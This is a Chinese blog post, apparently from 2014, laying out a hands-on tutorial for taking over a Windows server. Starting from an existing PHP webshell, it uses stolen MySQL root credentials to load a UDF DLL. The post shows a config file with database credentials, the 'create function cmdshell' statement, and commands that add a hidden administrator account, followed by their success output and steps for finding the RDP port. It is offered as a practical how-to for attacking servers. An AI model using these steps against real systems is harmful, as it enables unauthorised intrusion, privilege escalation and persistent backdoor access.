提权教程:实战mysql root权限UDF提权轻松拿下服务器
(2014-07-06 13:54:27)
标签:
it
提权
主题:实战mysql
root权限UDF提权轻松拿下服务器
by:lxsky
得到一个php webshell ,发现竟然是root权限的mysql数据库账号,不能错过,正好做一个实战教程.
1:得到mysql的root账号密码,可以找网站配置文件,不同网站系统位置不同.
#[数据库参数]
$dbHost="localhost";IP
$dbName="cp"; 数据库名称
$dbUser="root"; 账号
$dbPass="6025315";密码
#[数据表前缀]
$TablePre="pw";
2:得到服务器操作系统类型
windows 2000: C:\Winnt\udf.dll
windows 2003: C:\Windows\udf.dll
feng$是我刚才加的
3:上传UDF.PHP到网站空间,不好意思,搞错了,现在填上我们获取的账号密码
File 'C:\Windows\udf.dll' already exists 是因为我刚才已经导出了,提示已经存在!
上次忘了删除了,比较卡,ctrl+c都用不了,我晕
命令:
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user lxsky$ bkhack /add'); 增加用户
select cmdshell('net localgroup administrators lxsky$ /add');
提升到管理组
drop function cmdshell; 删除函数
最后我们别忘了删除
cmdshell('net user lxsky$ bkhack /add')
命令成功完成。
cmdshell('net localgroup administrators lxsky$ /add')
命令成功完成。
现在我们查看下用户,是否已经添加上了。我们加的账号是隐藏的,所以直接ney user lx
添加上的,
我删除了,退了吧,也没什么好玩的,这节课就到此位置,当大家看见root账号密码时,拿下服务器就不远了.
不过有些导出的udf会被秒杀...拜
现在我们就可以直接登录了,因为在开始我们就远程连接上了服务器,远程端口是默认的3389.
这里再交给大家怎么使用cmd命令来获取远程端口
1:tasklist /svc
svchost.exe 3540 TermService
记下PID3540
2:netstat /ano
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 3540
上面的 0.0.0.0:X 这个x就是远程端口了.OK《我们登录看
慢死....
下载地址:http://www.topjishu.net/jiaocheng/12.html
分享:
喜欢
0
赠金笔
加载中,请稍候......
评论加载中,请稍候...
发评论
登录名: 密码: 找回密码 注册记住登录状态
昵 称:
评论并转载此博文
发评论
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。